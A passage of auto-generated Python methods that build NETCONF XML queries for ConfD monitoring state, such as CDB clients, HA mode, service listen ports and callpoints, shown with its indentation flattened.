type = ET.SubElement(client, "type")
type.text = kwargs.pop('type')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_client_datastore(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
client = ET.SubElement(cdb, "client")
datastore = ET.SubElement(client, "datastore")
datastore.text = kwargs.pop('datastore')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_client_lock(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
client = ET.SubElement(cdb, "client")
lock = ET.SubElement(client, "lock")
lock.text = kwargs.pop('lock')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_client_subscription_datastore(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
client = ET.SubElement(cdb, "client")
subscription = ET.SubElement(client, "subscription")
datastore = ET.SubElement(subscription, "datastore")
datastore.text = kwargs.pop('datastore')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_client_subscription_twophase(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
client = ET.SubElement(cdb, "client")
subscription = ET.SubElement(client, "subscription")
twophase = ET.SubElement(subscription, "twophase")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_client_subscription_priority(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
client = ET.SubElement(cdb, "client")
subscription = ET.SubElement(client, "subscription")
priority = ET.SubElement(subscription, "priority")
priority.text = kwargs.pop('priority')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_client_subscription_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
client = ET.SubElement(cdb, "client")
subscription = ET.SubElement(client, "subscription")
id = ET.SubElement(subscription, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_client_subscription_path(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
client = ET.SubElement(cdb, "client")
subscription = ET.SubElement(client, "subscription")
path = ET.SubElement(subscription, "path")
path.text = kwargs.pop('path')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_cdb_client_subscription_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
cdb = ET.SubElement(internal, "cdb")
client = ET.SubElement(cdb, "client")
subscription = ET.SubElement(client, "subscription")
error = ET.SubElement(subscription, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_version(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
version = ET.SubElement(confd_state, "version")
version.text = kwargs.pop('version')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_smp_number_of_threads(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
smp = ET.SubElement(confd_state, "smp")
number_of_threads = ET.SubElement(smp, "number-of-threads")
number_of_threads.text = kwargs.pop('number_of_threads')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_epoll(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
epoll = ET.SubElement(confd_state, "epoll")
epoll.text = kwargs.pop('epoll')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_daemon_status(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
daemon_status = ET.SubElement(confd_state, "daemon-status")
daemon_status.text = kwargs.pop('daemon_status')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_read_only_mode(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
read_only_mode = ET.SubElement(confd_state, "read-only-mode")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_upgrade_mode(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
upgrade_mode = ET.SubElement(confd_state, "upgrade-mode")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_ha_mode(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
ha = ET.SubElement(confd_state, "ha")
mode = ET.SubElement(ha, "mode")
mode.text = kwargs.pop('mode')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_ha_node_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
ha = ET.SubElement(confd_state, "ha")
node_id = ET.SubElement(ha, "node-id")
node_id.text = kwargs.pop('node_id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_ha_master_node_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
ha = ET.SubElement(confd_state, "ha")
master_node_id = ET.SubElement(ha, "master-node-id")
master_node_id.text = kwargs.pop('master_node_id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_loaded_data_models_data_model_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
loaded_data_models = ET.SubElement(confd_state, "loaded-data-models")
data_model = ET.SubElement(loaded_data_models, "data-model")
name = ET.SubElement(data_model, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_loaded_data_models_data_model_revision(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
loaded_data_models = ET.SubElement(confd_state, "loaded-data-models")
data_model = ET.SubElement(loaded_data_models, "data-model")
name_key = ET.SubElement(data_model, "name")
name_key.text = kwargs.pop('name')
revision = ET.SubElement(data_model, "revision")
revision.text = kwargs.pop('revision')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_loaded_data_models_data_model_namespace(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
loaded_data_models = ET.SubElement(confd_state, "loaded-data-models")
data_model = ET.SubElement(loaded_data_models, "data-model")
name_key = ET.SubElement(data_model, "name")
name_key.text = kwargs.pop('name')
namespace = ET.SubElement(data_model, "namespace")
namespace.text = kwargs.pop('namespace')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_loaded_data_models_data_model_prefix(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
loaded_data_models = ET.SubElement(confd_state, "loaded-data-models")
data_model = ET.SubElement(loaded_data_models, "data-model")
name_key = ET.SubElement(data_model, "name")
name_key.text = kwargs.pop('name')
prefix = ET.SubElement(data_model, "prefix")
prefix.text = kwargs.pop('prefix')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_loaded_data_models_data_model_exported_exported_to_all_exported_to_all(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
loaded_data_models = ET.SubElement(confd_state, "loaded-data-models")
data_model = ET.SubElement(loaded_data_models, "data-model")
name_key = ET.SubElement(data_model, "name")
name_key.text = kwargs.pop('name')
exported = ET.SubElement(data_model, "exported")
exported_to_all = ET.SubElement(exported, "exported-to-all")
exported_to_all = ET.SubElement(exported_to_all, "exported-to-all")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_netconf_listen_tcp_ip(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
netconf = ET.SubElement(confd_state, "netconf")
listen = ET.SubElement(netconf, "listen")
tcp = ET.SubElement(listen, "tcp")
ip = ET.SubElement(tcp, "ip")
ip.text = kwargs.pop('ip')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_netconf_listen_tcp_port(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
netconf = ET.SubElement(confd_state, "netconf")
listen = ET.SubElement(netconf, "listen")
tcp = ET.SubElement(listen, "tcp")
port = ET.SubElement(tcp, "port")
port.text = kwargs.pop('port')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_netconf_listen_ssh_ip(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
netconf = ET.SubElement(confd_state, "netconf")
listen = ET.SubElement(netconf, "listen")
ssh = ET.SubElement(listen, "ssh")
ip = ET.SubElement(ssh, "ip")
ip.text = kwargs.pop('ip')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_netconf_listen_ssh_port(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
netconf = ET.SubElement(confd_state, "netconf")
listen = ET.SubElement(netconf, "listen")
ssh = ET.SubElement(listen, "ssh")
port = ET.SubElement(ssh, "port")
port.text = kwargs.pop('port')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_cli_listen_ssh_ip(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
cli = ET.SubElement(confd_state, "cli")
listen = ET.SubElement(cli, "listen")
ssh = ET.SubElement(listen, "ssh")
ip = ET.SubElement(ssh, "ip")
ip.text = kwargs.pop('ip')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_cli_listen_ssh_port(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
cli = ET.SubElement(confd_state, "cli")
listen = ET.SubElement(cli, "listen")
ssh = ET.SubElement(listen, "ssh")
port = ET.SubElement(ssh, "port")
port.text = kwargs.pop('port')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_webui_listen_tcp_ip(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
webui = ET.SubElement(confd_state, "webui")
listen = ET.SubElement(webui, "listen")
tcp = ET.SubElement(listen, "tcp")
ip = ET.SubElement(tcp, "ip")
ip.text = kwargs.pop('ip')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_webui_listen_tcp_port(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
webui = ET.SubElement(confd_state, "webui")
listen = ET.SubElement(webui, "listen")
tcp = ET.SubElement(listen, "tcp")
port = ET.SubElement(tcp, "port")
port.text = kwargs.pop('port')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_webui_listen_ssl_ip(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
webui = ET.SubElement(confd_state, "webui")
listen = ET.SubElement(webui, "listen")
ssl = ET.SubElement(listen, "ssl")
ip = ET.SubElement(ssl, "ip")
ip.text = kwargs.pop('ip')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_webui_listen_ssl_port(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
webui = ET.SubElement(confd_state, "webui")
listen = ET.SubElement(webui, "listen")
ssl = ET.SubElement(listen, "ssl")
port = ET.SubElement(ssl, "port")
port.text = kwargs.pop('port')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_rest_listen_tcp_ip(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
rest = ET.SubElement(confd_state, "rest")
listen = ET.SubElement(rest, "listen")
tcp = ET.SubElement(listen, "tcp")
ip = ET.SubElement(tcp, "ip")
ip.text = kwargs.pop('ip')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_rest_listen_tcp_port(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
rest = ET.SubElement(confd_state, "rest")
listen = ET.SubElement(rest, "listen")
tcp = ET.SubElement(listen, "tcp")
port = ET.SubElement(tcp, "port")
port.text = kwargs.pop('port')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_rest_listen_ssl_ip(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
rest = ET.SubElement(confd_state, "rest")
listen = ET.SubElement(rest, "listen")
ssl = ET.SubElement(listen, "ssl")
ip = ET.SubElement(ssl, "ip")
ip.text = kwargs.pop('ip')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_rest_listen_ssl_port(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
rest = ET.SubElement(confd_state, "rest")
listen = ET.SubElement(rest, "listen")
ssl = ET.SubElement(listen, "ssl")
port = ET.SubElement(ssl, "port")
port.text = kwargs.pop('port')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_snmp_listen_udp_ip(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
snmp = ET.SubElement(confd_state, "snmp")
listen = ET.SubElement(snmp, "listen")
udp = ET.SubElement(listen, "udp")
ip = ET.SubElement(udp, "ip")
ip.text = kwargs.pop('ip')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_snmp_listen_udp_port(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
snmp = ET.SubElement(confd_state, "snmp")
listen = ET.SubElement(snmp, "listen")
udp = ET.SubElement(listen, "udp")
port = ET.SubElement(udp, "port")
port.text = kwargs.pop('port')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_snmp_version_v1(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
snmp = ET.SubElement(confd_state, "snmp")
version = ET.SubElement(snmp, "version")
v1 = ET.SubElement(version, "v1")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_snmp_version_v2c(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
snmp = ET.SubElement(confd_state, "snmp")
version = ET.SubElement(snmp, "version")
v2c = ET.SubElement(version, "v2c")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_snmp_version_v3(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
snmp = ET.SubElement(confd_state, "snmp")
version = ET.SubElement(snmp, "version")
v3 = ET.SubElement(version, "v3")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_snmp_engine_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
snmp = ET.SubElement(confd_state, "snmp")
engine_id = ET.SubElement(snmp, "engine-id")
engine_id.text = kwargs.pop('engine_id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_callpoint_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
callpoint = ET.SubElement(callpoints, "callpoint")
id = ET.SubElement(callpoint, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_callpoint_registration_type_daemon_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
callpoint = ET.SubElement(callpoints, "callpoint")
id_key = ET.SubElement(callpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(callpoint, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
id = ET.SubElement(daemon, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_callpoint_registration_type_daemon_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
callpoint = ET.SubElement(callpoints, "callpoint")
id_key = ET.SubElement(callpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(callpoint, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_callpoint_registration_type_daemon_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
callpoint = ET.SubElement(callpoints, "callpoint")
id_key = ET.SubElement(callpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(callpoint, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_callpoint_registration_type_range_path(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
callpoint = ET.SubElement(callpoints, "callpoint")
id_key = ET.SubElement(callpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(callpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
path = ET.SubElement(range, "path")
path.text = kwargs.pop('path')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_callpoint_registration_type_range_range_lower(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
callpoint = ET.SubElement(callpoints, "callpoint")
id_key = ET.SubElement(callpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(callpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
lower = ET.SubElement(range, "lower")
lower.text = kwargs.pop('lower')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_callpoint_registration_type_range_range_upper(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
callpoint = ET.SubElement(callpoints, "callpoint")
id_key = ET.SubElement(callpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(callpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
upper = ET.SubElement(range, "upper")
upper.text = kwargs.pop('upper')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_callpoint_registration_type_range_range_default(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
callpoint = ET.SubElement(callpoints, "callpoint")
id_key = ET.SubElement(callpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(callpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
default = ET.SubElement(range, "default")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_callpoint_registration_type_range_range_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
callpoint = ET.SubElement(callpoints, "callpoint")
id_key = ET.SubElement(callpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(callpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
id = ET.SubElement(daemon, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_callpoint_registration_type_range_range_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
callpoint = ET.SubElement(callpoints, "callpoint")
id_key = ET.SubElement(callpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(callpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_callpoint_registration_type_range_range_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
callpoint = ET.SubElement(callpoints, "callpoint")
id_key = ET.SubElement(callpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(callpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
daemon = ET.SubElement(range, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_callpoint_registration_type_file_file(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
callpoint = ET.SubElement(callpoints, "callpoint")
id_key = ET.SubElement(callpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(callpoint, "registration-type")
file = ET.SubElement(registration_type, "file")
file = ET.SubElement(file, "file")
file.text = kwargs.pop('file')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_callpoint_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
callpoint = ET.SubElement(callpoints, "callpoint")
id_key = ET.SubElement(callpoint, "id")
id_key.text = kwargs.pop('id')
error = ET.SubElement(callpoint, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_validationpoint_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
validationpoint = ET.SubElement(callpoints, "validationpoint")
id = ET.SubElement(validationpoint, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_validationpoint_registration_type_daemon_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
validationpoint = ET.SubElement(callpoints, "validationpoint")
id_key = ET.SubElement(validationpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(validationpoint, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
id = ET.SubElement(daemon, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_validationpoint_registration_type_daemon_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
validationpoint = ET.SubElement(callpoints, "validationpoint")
id_key = ET.SubElement(validationpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(validationpoint, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_validationpoint_registration_type_daemon_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
validationpoint = ET.SubElement(callpoints, "validationpoint")
id_key = ET.SubElement(validationpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(validationpoint, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_validationpoint_registration_type_range_path(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
validationpoint = ET.SubElement(callpoints, "validationpoint")
id_key = ET.SubElement(validationpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(validationpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
